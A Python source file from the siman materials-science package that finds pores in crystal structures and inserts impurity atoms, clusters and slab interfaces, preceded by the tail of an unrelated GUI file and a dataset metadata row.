defaultBlessedImageFilename = os.path.abspath(defaultBlessedImageFilename)
isDefault = False
for filename in self.__filenames:
filename = os.path.abspath(filename)
if (filename == defaultBlessedImageFilename):
isDefault = True
break
if (isDefault):
blessFile = open(defaultContainerFilename, "w")
blessFile.close()
if (self.__callback != None):
self.__callback(False)
def __OnMakeDefault(self, e):
e.Skip()
# Rewrite the default blessed file to include these local filenames.
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR)
defaultContainerFilename = os.path.join(blessedDir, BLESSED_DEFAULT_FILE)
blessFile = open(defaultContainerFilename, "w")
if (self.__filenames != None) and (len(self.__filenames) > 0):
for filename in self.__filenames:
relativeFilename = FUtils.GetRelativePath(filename, blessedDir)
blessFile.write(relativeFilename)
blessFile.write("\n")
else:
pass # Intentionally leave empty. Can we actually get here in the UI?
blessFile.close()
if (self.__callback != None):
self.__callback(True)
| mit | 8,617,399,534,047,996,000 | 43.169884 | 466 | 0.603409 | false |
dimonaks/siman | siman/impurity.py | 1 | 35842

from __future__ import division, unicode_literals, absolute_import
import ctypes
from tabulate import tabulate
#from ctypes import *
from ctypes import cdll
from ctypes import c_float, byref
import numpy as np
import traceback, os, sys, datetime, glob, copy
from siman import header
from siman.header import print_and_log, printlog, geo_folder, runBash
from siman.classes import CalculationVasp, Structure
from siman.set_functions import InputSet
from siman.functions import return_atoms_to_cell, element_name_inv
from siman.inout import write_xyz
from siman.geo import local_surrounding, local_surrounding2, xcart2xred, xred2xcart
lib = cdll.LoadLibrary(os.path.dirname(__file__)+'/libfindpores.so')
def create_c_array(pylist, ctype):
if ctype == float:
c_array = (ctypes.c_float * len(pylist))(*pylist)
return c_array
def find_pores(st_in, r_matrix=1.4, r_impurity = 0.6, step_dec = 0.05, fine = 0.3, prec = 0.1, calctype = 'central', gbpos = 0,
find_close_to = (), check_pore_vol = 0):
"""
st_in - input Structure() object
r_impurity (A)- all pores smaller than this radius will be found
r_matrix (A) - radius of matrix atoms disregarding their type
step_dec - scanning step of the cell in Angstroms
fine - allows to change density of local points; local_step = step_dec/fine
prec - precision of pore center determination
check_pore_vol - allows to estimate volume of pores; has problems for big cells
'find_close_to' - works for the 'gb' and 'grain_vol' cases; ignores the other criteria and finds the pore closest to the provided three reduced coordinates
return - instance of Structure() class with coordinates of pores. Number and type of included pores depend on the argument of 'calctype'.
"""
xred = st_in.xred
natom = len(xred)
rprimd = st_in.rprimd
name = st_in.name
#print xred
"""Additional values"""
# check_pore_vol = 1
#if calctype in ("pore_vol","gb","grain_vol","all_local" ): check_pore_vol = 1 #something wrong with this function, especially for big cells
"""----Conversions of types for C++"""
r1 = create_c_array(rprimd[0], float)
r2 = create_c_array(rprimd[1], float)
r3 = create_c_array(rprimd[2], float)
xred1 = (c_float * len(xred))(*[x[0] for x in xred])
xred2 = (c_float * len(xred))(*[x[1] for x in xred])
xred3 = (c_float * len(xred))(*[x[2] for x in xred])
max_npores = 10000;
ntot = ctypes.c_int32(); npores = ctypes.c_int32()
l_pxred1 = (c_float * max_npores)(0) #make static arrays fol local points
l_pxred2 = (c_float * max_npores)(0)
l_pxred3 = (c_float * max_npores)(0)
l_npores = (ctypes.c_int32 * max_npores)(0)
pxred1 = (c_float * max_npores)(0) #make static arrays natoms + npore
pxred2 = (c_float * max_npores)(0)
pxred3 = (c_float * max_npores)(0)
"""----Run C++ function"""
print_and_log("Starting C++ function lib.findpores()...\n")
# print(r_matrix, r_impurity, step_dec, fine, prec)
lib.findpores ( check_pore_vol, \
max_npores, \
byref(ntot), l_pxred1, l_pxred2, l_pxred3, l_npores, \
byref(npores), pxred1, pxred2, pxred3, \
natom, xred1, xred2, xred3, \
c_float(r_matrix), c_float(r_impurity), c_float(step_dec), c_float(fine), c_float(prec), \
r1, r2, r3 )
print_and_log( "ntot is ", ntot.value)
print_and_log( "l_npores[0] is ",l_npores[0])
v = np.zeros((3))
l_pxred = []
shift1 = 0; shift2 = 0
for i_por in range(npores.value):
l_pxred.append( [] )
shift2+=l_npores[i_por]
for i in range(shift1, shift2):
v[0] = l_pxred1[i]; v[1] = l_pxred2[i]; v[2] = l_pxred3[i]
l_pxred[i_por].append( v.copy() )
shift1 = shift2
if shift2 != ntot.value:
print_and_log( "Error! final shift2 not equal to ntot")
#print l_pxred[0]
pxred = [] # only coordinates of pores
#print pxred1[natom]
for i in range(npores.value):
v[0] = pxred1[i+natom]; v[1]= pxred2[i+natom]; v[2] = pxred3[i+natom] #with shift, because first natom elements are coordinates of atoms
pxred.append( v.copy() )
#print pxred
"""----End of C++; result is two lists: lpxred - local geometry of all pores, pxred - coordinates of all pores"""
""" Analyse of pores """
# st_result = Structure()
st_result = st_in.new()
st_result.rprimd = rprimd
targetp = np.array((0.,0.,0.))
if find_close_to:
targetp = np.asarray(find_close_to) #targer point
print_and_log( "Target point is ",targetp)
a = step_dec/fine #the side of little cube formed by the mesh which is used to find spheres inside the pore.
aaa = a*a*a
#find most central pore
if calctype == 'central': #return coordinates of the most central pore
st_result.name = "central_pore_from "+name
center = np.array((0.5,0.5,0.5))#center of cell
d_min = 100
for x in pxred:
d = np.linalg.norm(x - center)
#print x, x-center, d
if d < d_min and x[0] <= 0.5 and x[1] <= 0.5 and x[2] <= 0.5:
d_min = d
x_min = x
print_and_log( "The closest pore to the center has coordinates",x_min)
st_result.xred.append( x_min )
elif calctype == 'gb': #add impurity at gb
st_result.name = "gb_pore_from "+name
d_min = 100; #d2_min = 100
dt_min =100
i_min = 0; x_min = np.zeros((3))
for i, x in enumerate(pxred):
#print "l_npores ",l_npores[i]
d = abs(x[0] - gbpos/rprimd[0][0]) #
#print x[0], d
if find_close_to: closer = (np.linalg.norm(targetp - x) < dt_min)
else: closer = ( d < d_min ) # and x[1]>0.3 and x[2]>0.3:
if closer:
x_pre = x_min
i_pre = i_min
d_min = d
dt_min = np.linalg.norm(targetp - x)
x_min = x
i_min = i
#find and add impurity in bulk
#d2 = abs( x[0] - (gbpos/rprimd[0][0] - 0.25) )
#if d2 < d2_min:
# d2_min = d2
# x2_min = x
# i2_min = i
#print "rprimd[0][0]", rprimd[0][0]
print_and_log( "Position of boundary is ",gbpos/rprimd[0][0])
#x_min[0] = gbpos/rprimd[0][0]
if find_close_to: print_and_log( "The closest pore to the target point is [ %.2f %.2f %.2f ]"%(x_min[0], x_min[1], x_min[2]))
else: print_and_log( "The closest pore to the gb has coordinates",x_min)
st_result.xred.append( x_min )
#st_result.xred.append( x_pre )
#Calculate volume of the pore using local balls:
print_and_log( "The number of pore is ",i_min," ; It has ",l_npores[i_min], "local balls")
print_and_log( "Volume of pore is ", l_npores[i_min] * a*a*a, " A^3")
#st_result.xred.extend( l_pxred[i_min] )
#st_result.xred.extend( l_pxred[i_pre] )
#print "The closest pore to the center of bulk has coordinates",x2_min
#st_result.xred.append( x2_min )
#Calculate volume of the pore using local balls:
#print "The number of bulk pore is ",i2_min," ; It has ",l_npores[i2_min], "local balls"
#print "Volume of pore is ", l_npores[i2_min] * a*a*a, " A^3";
#st_result.xred.extend( l_pxred[i2_min] )
elif calctype == 'grain_vol': #add impurity to volume of grain
st_result.name = "grain_volume_pore_from "+name
d2_min = 100
dt_min = 100
i_min = 0; x_min = np.zeros((3))
for i, x in enumerate(pxred):
#find and add impurity to the bulk
d2 = abs( x[0] - (gbpos/rprimd[0][0] - 0.25) )
if find_close_to: closer = (np.linalg.norm(targetp - x) < dt_min)
else: closer = ( d2 < d2_min ) # and x[1]>0.3 and x[2]>0.3:
if closer:
dt_min = np.linalg.norm(targetp - x)
d2_min = d2
x2_min = x
i2_min = i
if find_close_to: print_and_log( "The closest pore to the target point is [ %.2f %.2f %.2f ]"%(x2_min[0], x2_min[1], x2_min[2]))
else: print_and_log( "The closest pore to the center of bulk has coordinates",x2_min)
st_result.xred.append( x2_min )
#Calculate volume of the pore using local balls:
print_and_log( "The number of bulk pore is ",i2_min," ; It has ",l_npores[i2_min], "local balls")
print_and_log( "Volume of pore is ", l_npores[i2_min] * a*a*a, " A^3")
st_result.xred.extend( l_pxred[i2_min] )
elif calctype == 'all_local':
st_result.name = "all_local_points_from "+name
v_max = 0
i_max = 0
for i in range(npores.value):
v_pore = l_npores[i] * aaa
print_and_log( "Volume of pore is ", l_npores[i] * aaa, " A^3")
if v_pore > v_max: v_max = v_pore; i_max = i
print_and_log( "Pore number ", i_max,"has the largest volume ", v_max," A^3")
# st_result.xred = l_pxred[i_max] # here coordinates of all local points to show geometry of pore with largerst volume
st_result.xred = [x for group in l_pxred for x in group ] # all pores
elif calctype == 'all_pores':
st_result.name = "all_local_pores_from "+name
st_result.xred = pxred
st_result.rprimd = rprimd
st_result.xred2xcart()
st_result.typat = [1 for x in st_result.xred]
st_result.ntypat = 1
st_result.natom = len(st_result.typat)
st_result.znucl = [200]
st_ntypat = 1
return st_result
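# Illustrative usage sketch (added for clarity; not part of the original module).
# `st` is assumed to be a filled Structure() with rprimd, xred, typat and znucl set,
# e.g. read from a geo file. It returns the cartesian coordinates of the void
# closest to the cell centre, using the defaults documented above.
def example_find_central_pore(st):
    """Return cartesian coordinates of the pore closest to the cell centre."""
    pores = find_pores(st, r_matrix=1.4, r_impurity=0.6, step_dec=0.05,
                       fine=0.3, prec=0.1, calctype='central')
    return pores.xcart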
def add_impurity(it_new, impurity_type = None, addtype = 'central', calc = [], r_pore = 0.5,
it_to = '', ise_to = '', verlist_to = [], copy_geo_from = "", find_close_to = (),add_to_version = 0,
write_geo = True, only_version = None, fine = 4, put_exactly_to = None, check_pore_vol = 0, replace_atom = None, override = False):
"""
Add impurities in pores.
Input:
it_new - name of new structure with impurity
impurity_type - name of impurity from Mendeley table, for example 'C'
addtype - type of adding: ['central',]; 'central' means that impurity
will be placed as close to the geometrical center of cell as possible.
it_to , ise_to , verlist_to - completed calculations in which impurity
will be added
if 'verlist_to' is empty, function will try to find geometry files in 'geo_folder + struct_des[it_to].sfolder' folder;
even if 'it_to' is empty it will try to find files in 'geo_folder + struct_des[it_new].sfolder+'/from' ' folder.
'ise_to' also can be empty
if 'copy_geo_from' is not empty, then the program copies all files from folder 'copy_geo_from' to
folder 'geo_folder + struct_des[it_to].sfolder+"/"+it_to' or 'geo_folder + struct_des[it_new].sfolder+"/from" '
'find_close_to' is tuple of three reduced coordinates of point close to which you want to find impurity. If empty - ignored;
'add_to_version' is integer number added to each 'verlist_to' number to produce ver_new.
'only_version' - if == [v,], then instertion will be provided only for v. If None insertion will be made in all found versions
If you want to add impurity to relaxed structure ...
'fine' - integer number; larger values give smaller scanning steps when the pore center is refined
Possible addtype's:
'central' - add one atom to the pore which is most close to the center of the cell but with reduced coordinates less than 0.5 0.5 0.5
'all_pores' - add atoms in every found pore
'all_local' - add atoms to every local point which allows to visualise topology of pores.
'gb' - uses self.gbpos and places atom close to this value assuming that it will be at gb
'grain_vol' - uses self.gbpos and, assuming that the cell contains two gb and two equal grains, places the atom close to the centre of a grain; y and z can be arbitrary
put_exactly_to - will add impurity to this point
find_close_to - will try to find closest void and insert pore here.
check_pore_vol - allows to estimate volume of pores; has problems for big cells
replace_atom - if not None, then the specified atom is substituted
Side effects: creates new geometry folder with input structures;
"""
struct_des = header.struct_des
def test_adding_of_impurities(added, init, v):
"""
Can be used only inside add_impurity()
Replicates the structure and finds the pores again
"""
global natoms_v1
if added == None: return
if v == 1: #TEST
natoms_v1 = len(added.init.xcart) # for test
st_rep_after = added.init.replic( (1,2,1) )
rep = copy.deepcopy(init)
rep.init = rep.init.replic( (1,2,1) );
#print rep
rep = add(znucl, "", rep, write_geo = False)
#print rep
#print "xcart of replic after adding ", st_rep_after.xcart
#print "xcart of adding to replic ", rep.init.xcart
if len(st_rep_after.xcart) != len(rep.init.xcart): raise RuntimeError
p = 0
#for x2 in st_rep_after.xcart:
# print x2
for x in rep.init.xcart:
a = any( ( np.around(x2, p) == np.around(x, p) ).all() for x2 in st_rep_after.xcart )
#b = any( ( np.ceil(x2, p) == np.ceil(x, p) ).all() for x2 in st_rep_after.xcart )
#c = any( ( np.floor(x2, p) == np.floor(x, p) ).all() for x2 in st_rep_after.xcart )
#print a, b, c
#np.concatenate(a, b, c):
if not a:
print_and_log( "Error! Can't find ", np.around(x,3), "in replic ")
raise RuntimeError
#assert all([ all( np.around(v1, 8) == np.around(v2, 8) ) for (v1, v2) in zip(st_rep_after.xcart, rep.init.xcart) ])
print_and_log( "add_impurity: test succesfully done")
if natoms_v1 != len(added.init.xcart): print_and_log("You have different number of pores in different versions\n"); raise RuntimeError
return
def add(znucl, xyzpath = "", new = None, write_geo = True, put_exactly_to = None):
"if put_exactly_to is True, then atom just added and nothing are searched"
if write_geo and os.path.exists(new.path["input_geo"]) and not override:
print_and_log("add: File '"+new.path["input_geo"]+"' already exists; continue\n", imp = 'Y');
return new
#new.init = return_atoms_to_cell(new.init)
if replace_atom:
#atom substitution
if znucl not in new.init.znucl:
new.init.znucl.append(znucl)
new.init.ntypat+=1
new.init.typat[replace_atom] = new.init.ntypat
else:
ind = new.init.znucl.index(znucl)
new.init.typat[replace_atom] = ind + 1
new.init.nznucl = []
for typ in range(1, new.init.ntypat+1):
new.init.nznucl.append(new.init.typat.count(typ) )
else:
new_before = copy.deepcopy(new)
# new.init.xcart[-2][0]-=0.9 #was made once manually for c1gCOi10.1
# new.init.xcart[-2][2]+=0.2
# new.init.xred = xcart2xred(new.init.xcart, new.init.rprimd)
write_xyz(new.init)
#step = 0.042
step = 0.06
#r_pore = 0.56
#fine = 0.3 # for visualisation of pores
#fine = 4 #controls small steps; the steps are smaller for larger numbers
#r_pore = 0.54
prec = 0.004 # precision of center Angs
if new.hex_a == None:
r_mat = 1.48 -step
else:
r_mat = new.hex_a / 2 - step
if put_exactly_to:
pores_xred = [np.array(put_exactly_to),]
print_and_log( 'Impurity just put in ', pores_xred, imp = 'Y')
else:
pores = find_pores(new.init, r_mat, r_pore, step, fine, prec, addtype, new.gbpos, find_close_to, check_pore_vol) #octahedral
pores_xred = pores.xred
npores = len(pores_xred)
st = new.init
#delete last oxygen; was made once manually for c1gCOi10.1
# st.natom-=1
# del st.xred[-1]
# del st.typat[-1]
st.natom += npores
st.xred.extend( pores_xred )
if znucl in st.znucl:
print_and_log( "znucl of added impurity is already in cell")
ind = st.znucl.index(znucl)
typat = ind+1
st.nznucl[ind]+=npores
else:
st.ntypat +=1
typat = st.ntypat
st.znucl.append( znucl )
st.nznucl.append( npores )
for i in range( npores ):
st.typat.append( typat )
st.xred2xcart()
new.init = st
#print "Add impurity: len(xred ", len(new.init.xred)
#print "natom", new.init.natom
#For automatisation of fit
try:
#new.build
if new.build.nadded == None: new.build.nadded=npores
else: new.build.nadded+=npores
if new.build.listadded == [None]: new.build.listadded = range(new.natom - npores, new.natom) #list of atoms which were added
else: new.build.listadded.extend( range(new.natom - npores, new.natom) )
#print "Warning!!! Information about added impurities rewritten"
except AttributeError:
pass
#new.init.znucl = new.znucl
#new.init.typat = new.typat
#write_xyz(replic(new.init, (2,1,2)) , xyzpath)
#test_adding_of_impurities(new, new_before, v)
print_and_log("Impurity with Z="+str(znucl)+" has been added to the found pore in "+new.name+"\n\n")
if write_geo:
write_xyz(new.init , xyzpath)
new.write_geometry("init",new.des, override = override)
print_and_log( "\n")
return new
"""0.Begin----------------------------------------------------------------------------"""
znucl = element_name_inv(impurity_type)
if impurity_type != 'octa' and impurity_type not in it_new:
print_and_log("add_impurity: Your name 'it_new' is incorrect!\n\n")
raise RuntimeError
#del header.history[-2]
#
#hstring = ("add_impurity('%s', '%s', '%s', calc, %.3f, '%s', '%s', %s, '%s') #at %s" %
# (it_new, impurity_type, addtype, r_pore,
# it_to, ise_to, verlist_to, copy_geo_from,
# datetime.date.today() ) )
hstring = ("%s #on %s"% (traceback.extract_stack(None, 2)[0][3], datetime.date.today() ) )
if hstring != header.history[-1]: header.history.append( hstring )
#geo_exists =
"""1. The case of insertion to existing calculations--------------------------------------------------"""
if verlist_to:
for v in verlist_to:
if only_version and v not in only_version: continue # only_version = None works for all versions
id = (it_to, ise_to, v)
new = copy.deepcopy(calc[id])
new.init = new.end #replace init structure by the end structure
new.version = v+add_to_version
new.name = it_new#+'.'+id[1]+'.'+str(id[2])
new.des = 'Obtained from '+str(id)+' by adding '+impurity_type+' impurity '
path_new_geo = struct_des[it_new].sfolder+"/"+it_new+"/"+it_new+'.imp.'+addtype+'.'+str(new.version)+'.'+'geo'
new.init.name = it_new+".init."+str(new.version)
xyzpath = struct_des[it_new].sfolder+"/"+it_new
new.path["input_geo"] = geo_folder+path_new_geo
print_and_log("File '"+new.path["input_geo"] +"' with impurity will be created\n");
#new.init.name = 'test_before_add_impurity'
new = add(znucl, xyzpath, new, write_geo, put_exactly_to = put_exactly_to)
"""2. The case of insertion to geo files------------------------------------------------------------"""
else:
""" Please rewrite using new functions """
print_and_log("You does not set 'id' of relaxed calculation. I try to find geometry files in "+it_new+" folder\n")
if it_to: geo_path = geo_folder + struct_des[it_to].sfolder + "/" + it_to
else: geo_path = geo_folder + struct_des[it_new].sfolder + "/" + it_new+'/from'
if copy_geo_from:
print_and_log("You asked to copy geo files from "+copy_geo_from+" to " +geo_path+ " folder\n")
#if not os.path.exists(os.path.dirname(geo_path)):
runBash( "mkdir -p "+geo_path )
runBash( "cp "+copy_geo_from+"/* "+geo_path )
if os.path.exists(geo_path):
print_and_log("Folder '"+geo_path +"' was found. Trying to add impurity\n");
else:
print_and_log("Error! Folder "+geo_path+" does not exist\n"); raise RuntimeError
#geofilelist = glob.glob(geo_path+'/*.geo*') #Find input_geofile
#geofilelist = runBash('find '+geo_path+' -name "*grainA*.geo*" ').splitlines()
#geofilelist = runBash('find '+geo_path+' -name "*.geo*" ').splitlines()
geofilelist = glob.glob(geo_path+'/*.geo*')
print_and_log( "There are several files here already: ", geofilelist, imp = 'y' )
#print 'find '+geo_path+' -name "*.geo*" ',geofilelist
#return
for input_geofile in geofilelist:
v = int( runBash("grep version "+str(input_geofile) ).split()[1] )
if only_version and v not in only_version: continue # only_version = None works for all versions
new = CalculationVasp()
new.version = v
new.name = input_geofile
new.read_geometry(input_geofile)
init = copy.deepcopy(new)
igl = input_geofile.split("/")
#new.name = igl[-3]+'/'+igl[-3] #+input_geofile
new.name = struct_des[it_new].sfolder+"/"+it_new+"/"+it_new
print_and_log( "New path and part of name of file is ", new.name, imp = 'Y')
#return
new.des = 'Obtained from '+input_geofile+' by adding '+impurity_type+' impurity '
#new.init.xred = new.xred
#new.init.rprimd = new.rprimd
#print new.rprimd
new.init.name = new.name+'.imp.'+addtype+'.'+str(new.version)
#new.path["input_geo"] = geo_folder+it_new+"/"+new.end.name+'.'+'geo'
new.path["input_geo"] = geo_folder+"/"+new.init.name+'.'+'geo'
#new.init.name = 'test_before_add_impurity'
new = add(znucl, "", new, write_geo, put_exactly_to = put_exactly_to)
return new.path["input_geo"] #return for last version
def insert_cluster(insertion, i_center, matrix, m_center):
"""
Take care of orientation; typat should be consistent
Input:
insertion - object of class Structure(), which is supposed to be inserted in matrix
in such a way that i_center will be combined with m_center.
matrix - object of class Structure().
i_center, m_center - numpy arrays (3) cartesian coordinates
"""
ins = copy.deepcopy(insertion)
mat = copy.deepcopy(matrix)
r = mat.rprimd
hproj = [ (r[0][i]+r[1][i]+r[2][i]) * 0.5 for i in (0,1,2) ] #projection of vectors on three axis
if 1:
for i, x in enumerate(ins.xcart):
ins.xcart[i] = x - i_center
for i, x in enumerate(mat.xcart):
mat.xcart[i] = x - m_center
max_dis = 1
for i_x, ix in enumerate(ins.xcart):
dv_min = max_dis
print_and_log( "Insertion atom ",ix,)
if 1:
for j, mx in enumerate(mat.xcart):
dv = mx - ix
for i in 0,1,2:
if dv[i] > hproj[i]: dv = dv - mat.rprimd[i] #periodic boundary conditions - can be not correct (in the sense that closest image can lie not 100 % in the neighbourhood image cell ) for oblique cells and large absolute values of dv
if dv[i] < -hproj[i]: dv = dv + mat.rprimd[i]
len1 = np.linalg.norm(dv)
len2, second_len2 = mat.image_distance(mx, ix, r, 1) #check len1
#print "Lengths calculated with two methods ", len1, len2
len1 = len2 #just use second method
#assert np.around(len1,1) == np.around(len2,1)
if len1 < dv_min:
dv_min = len1;
j_r = j # number of matrix atom to replace
if 1:
#Modify to replace overlapping atoms
if dv_min == max_dis:
print_and_log( " is more far away from any matrix atom than ",dv_min," A; I insert it")
# mat.xcart.append( ix )
# print_and_log( 'type of added atom is ', ins.typat[i_x])
# mat.typat.append( ins.typat[i_x] )
mat = mat.add_atom(xc = ix, element = ins.get_elements()[i_x] )
else:
print_and_log( "will replace martix atom", mat.xcart[j_r] )
mat.xcart[j_r] = ix.copy()
mat.rprimd = r
mat.xcart2xred()
mat.natom = len(mat.xcart)
mat.name = 'test_of_insert'
st = mat
# print(st.natom, len(st.xcart), len(st.typat), len(st.znucl), max(st.typat) )
# write_xyz(mat)
mat = mat.return_atoms_to_cell()
mat.write_poscar()
return mat
#write_xyz(mat)
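# Illustrative usage sketch (added for clarity; `cluster` and `matrix` are assumed
# to be CalculationVasp objects with filled .end and .init structures, and the
# target point m_center is hypothetical). Matrix atoms closer than 1 A to an
# inserted atom are replaced by it, as in the loop above.
def example_insert_cluster(cluster, matrix):
    """Combine a relaxed cluster with a matrix cell, gluing their chosen points."""
    i_center = np.zeros(3)                 # point of the cluster to align (its origin)
    m_center = np.array([5.0, 5.0, 5.0])   # hypothetical target point in the matrix
    return insert_cluster(cluster.end, i_center, matrix.init, m_center)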
def make_interface(main_slab, m_xc, second_slab, s_xc):
"""
Make interfaces
Both slabs should have close sizes along x and y and should be oriented correctly
Input:
main_slab (Structure) - slab
second_slab (Structure) - slab, scaled to coincide with the main slab
m_xc, s_xc (array(3)) - cartesian coordinates of pointis in main_slab and secondary slab to be combined
Return Slab with interface and scaled second slab
"""
ins = copy.deepcopy(second_slab)
mat = copy.deepcopy(main_slab)
if 1:
#scale insertion
mr = mat.rprimd_len()
ir = ins.rprimd_len()
print('Matrix vlength', mr)
print('Insert vlength', ir)
x_scale = mr[0]/ ir[0]
y_scale = mr[1]/ ir[1]
print('Scaling factors', x_scale, y_scale)
# print('i_center', i_center)
ins.rprimd[0] = ins.rprimd[0]*x_scale
ins.rprimd[1] = ins.rprimd[1]*y_scale
ir = ins.rprimd_len()
s_xred = xcart2xred([s_xc], ins.rprimd)[0]
print('Insert vlength after scaling', ir)
ins.update_xcart()
# ins.xcart2xred()
ins_sc = ins.copy()
ins_sc.name+='_scaled'
s_xc = xred2xcart([s_xred], ins.rprimd)[0]
# print('i_center', i_center)
if 1:
for i, x in enumerate(ins.xcart):
ins.xcart[i] = x - s_xc
for i, x in enumerate(mat.xcart):
mat.xcart[i] = x - m_xc
for i_x, ix in enumerate(ins.xcart):
mat = mat.add_atom(xc = ix, element = ins.get_elements()[i_x] )
mat.xcart2xred()
mat.natom = len(mat.xcart)
mat.name += 'inteface'
mat = mat.return_atoms_to_cell()
mat = mat.shift_atoms([0,0,0.5])
return mat, ins_sc
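# Illustrative usage sketch (added for clarity; `slab1` and `slab2` are assumed to
# be Structure() slabs already oriented with comparable lateral vectors). The second
# slab is rescaled laterally and glued so that the two chosen points coincide.
def example_make_interface(slab1, slab2):
    """Glue slab2 onto slab1, matching their first atoms at the interface."""
    return make_interface(slab1, slab1.xcart[0], slab2, slab2.xcart[0])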
def insert(it_ins, ise_ins, mat_path, it_new, calc, type_of_insertion = "xcart" ):
"""For insertion of atoms to cells with changed lateral sizes
Input:
'type_of_insertion = xred' used to add xred coordinates
mat_path - path to geo files which are supposed to be changed
it_ins - already existing calculation; xred will be used from this calculation.
it_new - new folder in geo folder for obtained structure
This function finds version of calculation in folder mat_path and tries to use the same version of it_ins
"""
if not os.path.exists(mat_path):
print_and_log("Error! Path "+mat_path+" does not exist\n\n")
raise RuntimeError
if it_ins not in mat_path and it_ins not in it_new:
print_and_log('Cells are', it_ins, mat_path, it_new)
print_and_log("Error! you are trying to insert coordinates from cell with different name\n\n")
#raise RuntimeError
hstring = ("%s #on %s"% (traceback.extract_stack(None, 2)[0][3], datetime.date.today() ) )
if hstring != header.history[-1]: header.history.append( hstring )
geofilelist = runBash('find '+mat_path+'/target -name "*.geo*" ').splitlines()
if geofilelist == []:
print_and_log("Warning! Target folder is empty. Trying to find in root folder ...")
geofilelist = runBash('find '+mat_path+'/ -name "*.geo*" ').splitlines()
ins = None
for mat_geofile in geofilelist:
mat = CalculationVasp()
mat.name = mat_geofile
mat.read_geometry(mat_geofile)
#step = 0.27
#r_pore = 0.56
#r_mat = mat.hex_a / 2 - step
#pores = find_pores(mat.init, r_mat, r_pore, step, 0.3, 'central') #octahedral
#mat.xcart.append ( pores.xcart[0] )
#mat.typat.append(1)
try:
ins_working = ins
ins = calc[(it_ins, ise_ins, mat.version)]
except KeyError:
print_and_log( "No key", (it_ins, ise_ins, mat.version), "I use previous working version !!!", imp = 'y' )
ins = ins_working
#return
#ins.end.znucl = ins.znucl
#ins.end.nznucl = ins.nznucl
#ins.end.ntypat = ins.ntypat
#ins.end.typat = ins.typat
#print ins.xcart[-1]
mat_geopath = geo_folder+struct_des[it_new].sfolder + '/'
if type_of_insertion == "xcart":
#Please update here!
mat_filename = '/'+it_new+"."+"inserted."+str(mat.version)+'.'+'geo'
v = np.zeros(3)
result = insert_cluster(ins.end, v, mat.init, v )
mat.end = result
mat.init = result
# mat.znucl = mat.end.znucl
# mat.nznucl = mat.end.nznucl
# mat.ntypat = mat.end.ntypat
# mat.typat = mat.end.typat
# mat.natom = len(mat.end.xred)
#mat.version = ins.version
des = ins.name+" was inserted to "+mat_geofile
elif type_of_insertion == "xred":
mat_filename = '/from/'+it_new+".xred."+str(mat.version)+'.'+'geo'
#mat.end.rprimd = mat.rprimd
#mat.init.xred = copy.deepcopy(ins.end.xred)
#mat.init.typat = copy.deepcopy(ins.end.)
#print ins.end.xcart
rprimd = copy.deepcopy(mat.init.rprimd)
#build = mat.build
mat.init = copy.deepcopy(ins.end)
#mat.build = build
mat.init.rprimd = rprimd #return initial rprimd
mat.init.xred2xcart() #calculate xcart with new rprimd
des = "atoms with reduced coord. from "+ins.name+" was fully copied to "+mat_geofile
mat.init.name = 'test_insert_xred'+str(mat.version)
write_xyz(mat.init)
mat.path["input_geo"] = mat_geopath + it_new + mat_filename
if not mat.write_geometry("init",des): continue
print_and_log("Xred from "+it_ins+" was inserted in "+mat_geofile+" and saved as "+mat_filename+" \n\n")
return
def determine_voids(st, r_impurity, fine = 1, step_dec = 0.05):
if not r_impurity:
        printlog('determine_voids(): Error! Please provide *r_impurity* (1.6 A?)')
sums = []
avds = []
printlog('Searching for voids', important = 'y')
st_pores = find_pores(st, r_matrix = 0.5, r_impurity = r_impurity, step_dec = step_dec, fine = fine, calctype = 'all_pores')
printlog('List of found voids:\n', np.array(st_pores.xcart) )
write_xyz(st.add_atoms(st_pores.xcart, 'H'), file_name = st.name+'_possible_positions')
write_xyz(st.add_atoms(st_pores.xcart, 'H'), replications = (2,2,2), file_name = st.name+'_possible_positions_replicated')
for x in st_pores.xcart:
# summ = local_surrounding(x, st, n_neighbours = 6, control = 'sum', periodic = True)
# avd = local_surrounding(x, st, n_neighbours = 6, control = 'av_dev', periodic = True)
summ, avd = local_surrounding2(x, st, n_neighbours = 6, control = 'sum_av_dev', periodic = True)
# print (summ, avd)
sums.append(summ)
avds.append(avd[0])
# print
sums = np.array(sums)
avds = np.array(avds).round(0)
print_and_log('Sum of distances to 6 neighboring atoms for each void (A):\n', sums, imp ='y')
print_and_log('Distortion of voids (0 - is symmetrical):\n', avds, imp ='y')
return st_pores, sums, avds
def determine_unique_voids(st_pores, sums, avds):
crude_prec = 1 # number of signs after 0
sums_crude = np.unique(sums.round(crude_prec))
print_and_log('The unique voids based on the sums:',
'\nwith 0.01 A prec:',np.unique(sums.round(2)),
'\nwith 0.1 A prec:',sums_crude,
imp ='y')
print_and_log('Based on crude criteria only', len(sums_crude),'types of void are relevant', imp = 'y')
insert_positions = []
start_table = []
for i, s in enumerate(sums_crude):
index_of_first = np.where(sums.round(crude_prec)==s)[0][0]
start_table.append([i, st_pores.xcart[index_of_first].round(2), index_of_first,
avds[index_of_first], sums[index_of_first] ])
insert_positions.append( st_pores.xcart[index_of_first] )
print_and_log( tabulate(start_table, headers = ['void #', 'Cart.', 'Index', 'Dev.', 'Sum'], tablefmt='psql'), imp = 'Y' )
return insert_positions
def insert_atom(st, el, i_void = None, i_void_list = None, r_imp = 1.6, ):
"""Simple Wrapper for inserting atoms
i_void (int) has higher priority than i_void_list
return st_new, i_add, sts_by_one
st_new - all positions are filled
i_add - the number of last inserted atom
sts_by_one - list of structures with only one inserted atom in all found positions
"""
r_impurity = r_imp
st_pores, sums, avds = determine_voids(st, r_impurity)
insert_positions = determine_unique_voids(st_pores, sums, avds)
printlog('To continue please choose *i_void* from the list above', imp = 'y')
# st.name = st.name.split('+')[0]
    if i_void is not None:
i_void_list = [i_void]
if i_void_list is None:
i_void_list = list(range(len(insert_positions)))
printlog('No i_void was provided, I insert all', imp = 'y')
st_new = st.copy()
sts_by_one = []
for i in i_void_list:
xc = insert_positions[i]
st_new, i_add = st_new.add_atoms([xc], el, return_ins = True)
st_one, _ = st.add_atoms([xc], el, return_ins = True)
st_one.name+='+'+el+str(i)
sts_by_one.append(st_one)
st_new.name+='+'+el+str(i)
st_new.des+=';Atom '+el+' added to '+ str(xc)
printlog(st.des, imp = 'y')
st_new.write_poscar()
st_new.magmom = [None]
return st_new, i_add, sts_by_one
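# A minimal usage sketch for the void helpers above (illustrative only, kept as a
# comment so nothing runs on import). "st" is a hypothetical Structure object.
#
#   st_pores, sums, avds = determine_voids(st, r_impurity = 1.6)
#   positions = determine_unique_voids(st_pores, sums, avds)
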